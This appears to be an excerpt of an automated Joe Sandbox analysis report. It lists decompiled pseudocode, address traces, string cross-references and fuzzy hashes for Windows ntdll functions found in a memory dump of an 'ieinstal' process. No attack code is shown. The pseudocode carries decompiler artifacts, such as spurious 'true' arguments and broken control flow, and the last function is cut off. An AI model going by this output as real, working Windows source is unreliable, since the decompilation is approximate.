0x227698b1
0x227698b6
0x227698b8
0x227698b8
0x227698b9
0x00000000
0x227698b9
0x22717ea0
0x22717ea7
0x00000000
0x00000000
0x22717eac
0x22717eb1
0x22717ec6
0x22717ed0
0x227698cc
0x22717ed6
0x22717ed6
0x22717ed6
0x22717ede
0x22717ee3
0x227698e3
0x227698f0
0x22769902
0x227698f2
0x227698fb
0x227698fb
0x22769907
0x2276991d
0x2276991d
0x22769907
0x227698e3
0x22717ef0
0x22717f14
0x22717f14
0x22717f1e
0x22769946
0x22717f24
0x22717f24
0x22717f24
0x22717f2c
0x2276996a
0x22769975
0x22769975
0x2276997e
0x22769993
0x22769993
0x2276997e
0x00000000
0x22717ef2
0x22717efc
0x22717f0a
0x22717f0e
0x22769933
0x00000000
0x22769933
0x00000000
0x22717f0e
0x00000000
0x00000000
0x00000000
0x22717eb1

Strings

LdrpCompleteMapModule, xrefs: 22769898
Could not validate the crypto signature for DLL %wZ, xrefs: 22769891
minkernel\ntdll\ldrmap.c, xrefs: 227698A2

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 2059cab11d4015a957866853e8569ba0bdcca3ae225330eb9acf0316778081ab
Instruction ID: eff4480941ec629a6431390eeaa3e146847cfa02ad3f4cad23ac97391ef06fea
Opcode Fuzzy Hash: 2059cab11d4015a957866853e8569ba0bdcca3ae225330eb9acf0316778081ab
Instruction Fuzzy Hash: F051EE31A08745DFD722CB68CA84FAA7BE4AF41318F500699E951AB7D1D734EE04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 2270E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E2270E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E2270F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							L227495D0();
						}
						if(_t78 != 0) {
							L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E2274FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E2274BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E22749600();
					if(_t97 < 0) {
						goto L6;
					}
					E2274BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L2270F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E2274BB40(_t83, _t102 + 0x24, _t78);
								if(L227143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E2274BB40(_t84, _t102 + 0x24, _t94);
									if(L227143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t75 =  &(_t94[1]);
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x2270e620
0x2270e628
0x2270e62f
0x2270e631
0x2270e635
0x2270e637
0x2270e63e
0x22765503
0x22765503
0x2270e64c
0x2270e64c
0x2270e651
0x00000000
0x00000000
0x2270e661
0x2270e665
0x2276542a
0x2270e715
0x2270e71a
0x2270e71c
0x2270e720
0x2270e720
0x2270e727
0x2270e736
0x2270e736
0x2270e743
0x2270e743
0x2270e673
0x2270e678
0x2270e67d
0x2270e682
0x2270e685
0x2270e692
0x2270e69b
0x2270e6a3
0x2270e6ad
0x2270e6b1
0x2270e6b2
0x2270e6bb
0x2270e6bf
0x2270e6c0
0x2270e6c8
0x2270e6cc
0x2270e6d5
0x2270e6d9
0x00000000
0x00000000
0x2270e6e5
0x2270e6ea
0x2270e6f9
0x2270e70b
0x2270e70f
0x22765439
0x2276545e
0x2276545e
0x00000000
0x2276545e
0x2276543b
0x2276543e
0x22765440
0x22765445
0x22765472
0x22765475
0x2276548d
0x22765493
0x227654a9
0x00000000
0x00000000
0x227654ab
0x227654b4
0x227654bc
0x227654c8
0x227654de
0x227654fb
0x227654e0
0x227654e6
0x227654eb
0x227654eb
0x227654de
0x00000000
0x227654bc
0x22765477
0x2276547a
0x22765480
0x22765483
0x22765486
0x2276548b
0x00000000
0x00000000
0x00000000
0x2276548b
0x00000000
0x00000000
0x00000000
0x00000000
0x22765447
0x22765447
0x22765447
0x2276544e
0x00000000
0x00000000
0x22765450
0x22765452
0x22765455
0x2276545a
0x00000000
0x00000000
0x00000000
0x2276545c
0x2276546a
0x2276546d
0x2276546f
0x00000000
0x2276546f
0x2270e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 2270E68C
InstallLanguageFallback, xrefs: 2270E6DB
@, xrefs: 2270E6C0

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: c633a9c8d4ff4026a8c483686482b392fce4d384f7ef5303c984b792c11eb59b
Instruction ID: 0cc68f690e3b45f325abc661f6482cd696044f29c814b4f506a5f8af23313a22
Opcode Fuzzy Hash: c633a9c8d4ff4026a8c483686482b392fce4d384f7ef5303c984b792c11eb59b
Instruction Fuzzy Hash: AF518E7691D3469BC711CF24C544A7AB7E8AF88714F41096EFA85A7240FB34DA08C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 2273FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E2273FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E2271EEF0(0x227f7b60);
					_t134 =  *0x227f7b84; // 0x77e47b80
					_t75 = _t174 + 0x24;
					if( *_t134 != 0x227f7b80) {
						_push("true");
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x227f7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = L22716D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E227176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = L227A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														L2270B150();
													}
													_t116 = L227A6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = L227175CE(_v20, "true", 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x227f8638; // 0x68f10e8
																	_t122 = L227138A4(_t153, _t176, _v16, _t170 | 0x00000002, "true", "true",  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E227176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E227176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L2273FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L227170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = L2273FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = L2273FD9B(_t177, 0, "true");
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = L2273FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = L2273FD9B(_t177, 0, "true");
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = L2273FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x227f7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x227f7b84 = _t75;
						_t73 = E2271EB70(_t134, 0x227f7b60);
						if( *0x227f7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E2271FF60( *0x227f7b20);
							}
						}
						goto L5;
					}
				}
			}

0x2273fab0
0x2273fab2
0x2273fab3
0x2273fab4
0x2273fabc
0x2273fac0
0x2273fb14
0x2273fb17
0x2273fac2
0x2273fac8
0x2273facd
0x2273fad3
0x2273fadd
0x2273fb18
0x2273fb1b
0x2273fb1d
0x2273fb1e
0x2273fb1f
0x2273fb20
0x2273fb21
0x2273fb22
0x2273fb23
0x2273fb24
0x2273fb25
0x2273fb26
0x2273fb27
0x2273fb28
0x2273fb29
0x2273fb2a
0x2273fb2b
0x2273fb2c
0x2273fb2d
0x2273fb2e
0x2273fb2f
0x2273fb3a
0x2273fb3b
0x2273fb3e
0x2273fb41
0x2273fb44
0x2273fb47
0x2273fb4a
0x2273fb4d
0x2273fb53
0x2277bdcb
0x2277bdcb
0x2273fb59
0x2273fb5b
0x2273fb5b
0x2273fb5e
0x2277bdd5
0x2277bdd8
0x00000000
0x2277bdda
0x00000000
0x2277bdda
0x2273fb64
0x2273fb64
0x2273fb64
0x2273fb67
0x2273fb6e
0x2273fb70
0x2273fb72
0x00000000
0x2273fb78
0x2273fb7a
0x2273fb7a
0x2273fb7d
0x2273fb80
0x2277bddf
0x2277bde1
0x00000000
0x2277bde3
0x00000000
0x2277bde3
0x2273fb86
0x2273fb86
0x2273fb86
0x2273fb8b
0x2273fb90
0x2273fb92
0x2273fb94
0x2273fb9a
0x2273fb9b
0x2273fba1
0x2277bde8
0x2277bdeb
0x2277bded
0x2277beb5
0x2277beb5
0x2277bebb
0x2277bebd
0x2277bec3
0x2277bed2
0x2277bedd
0x2277bedd
0x2277beed
0x00000000
0x2277bdf3
0x2277bdfe
0x2277be06
0x2277be0b
0x2277be0d
0x2277be0f
0x2277be14
0x2277be19
0x2277be20
0x2277be25
0x2277be27
0x2277be35
0x2277be39
0x2277be46
0x2277be4f
0x2277be54
0x2277be56
0x2277bef8
0x2277bef8
0x00000000
0x2277be5c
0x2277be5c
0x2277be60
0x00000000
0x2277be66
0x2277be66
0x2277be7f
0x2277be84
0x2277be87
0x2277be89
0x2277be8b
0x2277be99
0x2277be9d
0x2277bea0
0x2277beac
0x2277beaf
0x2277beb1
0x2277beb3
0x2277beb3
0x00000000
0x2277bea2
0x2277bea2
0x00000000
0x2277bea2
0x2277be8d
0x2277be8d
0x2277be92
0x00000000
0x2277be92
0x2277be8b
0x2277be60
0x2277be3b
0x2277be3b
0x2277be3e
0x00000000
0x2277be40
0x2277be40
0x2277be44
0x00000000
0x00000000
0x00000000
0x00000000
0x2277be44
0x2277be3e
0x2277be29
0x2277be29
0x00000000
0x2277be29
0x2277be27
0x00000000
0x2273fba7
0x2273fba7
0x2273fbab
0x2277bf02
0x2273fbb1
0x2273fbb1
0x2273fbb8
0x2273fbbd
0x2273fbbd
0x2273fbbf
0x2273fbbf
0x2273fbc5
0x2273fbcb
0x2273fbf8
0x2273fbf8
0x2273fbfa
0x00000000
0x2273fc00
0x2273fc00
0x2273fc03
0x00000000
0x2273fc09
0x2273fc09
0x2273fc0f
0x2273fc15
0x2273fc23
0x2273fc23
0x2273fc25
0x2273fc27
0x2273fc75
0x2273fc7c
0x2273fc84
0x00000000
0x2273fc29
0x2273fc29
0x2273fc2d
0x2273fc30
0x2277bf0f
0x00000000
0x2273fc36
0x2273fc38
0x2273fc3b
0x2273fc41
0x2277bf17
0x2277bf19
0x2277bf48
0x2277bf4b
0x00000000
0x2277bf1b
0x2277bf22
0x2277bf24
0x2277bf26
0x00000000
0x2277bf2c
0x2277bf37
0x2277bf39
0x2277bf3b
0x00000000
0x2277bf41
0x2277bf41
0x2277bf41
0x2277bf41
0x2277bf45
0x00000000
0x2277bf45
0x2277bf3b
0x2277bf26
0x00000000
0x2273fc47
0x2273fc47
0x2273fc49
0x2273fcb2
0x2273fcb4
0x2273fcb6
0x2273fcdc
0x2273fcdc
0x00000000
0x2273fcb8
0x2273fcc3
0x2273fcc5
0x2273fcc7
0x00000000
0x2273fcc9
0x2273fcc9
0x2273fccd
0x00000000
0x2273fccd
0x2273fcc7
0x00000000
0x2273fc4b
0x2273fc4b
0x2273fc4e
0x2273fc4e
0x2273fc51
0x2273fc51
0x2273fc54
0x2273fc5a
0x2273fc5c
0x2273fc5f
0x2273fc61
0x2273fc63
0x2273fc65
0x2273fc67
0x2273fc6e
0x2273fc72
0x2273fc72
0x2273fc72
0x2273fc72
0x2273fc67
0x2273fc61
0x00000000
0x2273fc5a
0x2273fc49
0x2273fc41
0x2273fc30
0x2273fc27
0x2273fc03
0x2273fbcd
0x2273fbd3
0x2273fbd9
0x2273fbdc
0x2273fbde
0x2273fc99
0x2273fc9b
0x2273fc9d
0x2273fcd5
0x2273fcd5
0x2273fc89
0x2273fc89
0x00000000
0x2273fc9f
0x2273fc9f
0x2273fca3
0x00000000
0x2273fca3
0x00000000
0x2273fbe4
0x2273fbe4
0x2273fbe4
0x2273fbe4
0x2273fbe9
0x2273fbf2
0x00000000
0x2273fbf2
0x2273fbde
0x2273fbcb
0x2273fbab
0x2273fc8b
0x2273fc8b
0x2273fc8c
0x2273fb80
0x2273fb72
0x2273fb5e
0x2273fc8d
0x2273fc91
0x2273fadf
0x2273fadf
0x2273fae1
0x2273fae4
0x2273fae7
0x2273faec
0x2273faf8
0x2273fb00
0x2273fb07
0x2273fb0f
0x2273fb0f
0x2273fb07
0x00000000
0x2273faf8
0x2273fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 2277BE0F

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: bbdf98cca8a6a7bc2a2b2c8060b9833128333597fafb2170895e8a964271ac98
Instruction ID: 88c1e14912353fc00fa32baa6d69c968a5028e4481bc1391242b399a33ae9312
Opcode Fuzzy Hash: bbdf98cca8a6a7bc2a2b2c8060b9833128333597fafb2170895e8a964271ac98
Instruction Fuzzy Hash: 8BA13371B097068FDB12CF69C554BAAB3B5AF48754F00466EEA01DB782DF34D901CB82

Uniqueness

Uniqueness Score: -1.00%

Function 227D0EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E227D0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E227CFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						L227D1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_v36 = __edx + 1 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push("true");
					_push( &_v24);
					_push("true");
					_push(_t93);
					_push(0xffffffff);
					_t80 = L22749730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						L227CA80D(_t115, "true", _v20, _t117);
						_push("true");
						_pop(_t83);
					}
				}
				if(L227CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x227f8b04 >> 0x14) + (_v44 -  *0x227f8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(L22727D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						L227C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, "true");
					}
					if(L22727D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E227BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x227f8724 & 0x00000008) != 0) {
						E227C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(L227D15B5(0x227f8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x227d0eb7
0x227d0eb9
0x227d0ec0
0x227d0ec2
0x227d0ecd
0x227d105b
0x227d105b
0x227d1061
0x227d1066
0x227d1066
0x227d106b
0x227d1073
0x227d1073
0x227d0ed3
0x227d0edc
0x227d0ee0
0x227d0ee7
0x227d0ef0
0x227d0ef5
0x227d0efa
0x227d0efc
0x227d0efd
0x227d0f03
0x227d0f04
0x227d0f06
0x227d0f07
0x227d0f09
0x227d0f0e
0x227d0f14
0x227d0f23
0x227d0f2d
0x227d0f32
0x227d0f34
0x227d0f34
0x227d0f14
0x227d0f52
0x00000000
0x00000000
0x227d0f58
0x227d0f73
0x227d0f74
0x227d0f79
0x227d0f7d
0x227d0f80
0x227d0f86
0x227d0fab
0x227d0fb5
0x227d0fc6
0x227d0fd1
0x227d0fe3
0x227d0fd3
0x227d0fdc
0x227d0fdc
0x227d0feb
0x227d1009
0x227d1009
0x227d1015
0x227d1027
0x227d1017
0x227d1020
0x227d1020
0x227d102f
0x227d103c
0x227d103c
0x227d1048
0x227d1050
0x227d1050
0x227d1055
0x00000000
0x227d1055
0x227d0f88
0x227d0f9e
0x227d0fa2
0x227d0fa9
0x00000000
0x00000000
0x00000000
0x227d0fa9
0x00000000

Strings

`, xrefs: 227D0F16

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 2b92c706da893fa69284e6571ac6b4b495f2e2549529f625f61c410862638730
Instruction ID: af24375d9125d5d006b50e6c0f5b323624b51423fe2de0c197fb3827848d015c
Opcode Fuzzy Hash: 2b92c706da893fa69284e6571ac6b4b495f2e2549529f625f61c410862638730
Instruction Fuzzy Hash: 50519F7220C3819FD311DF24D984B1BB7E5EBC8748F500A2DFA96A7291D775E805C762

Uniqueness

Uniqueness Score: -1.00%

Function 2273D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E2273D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
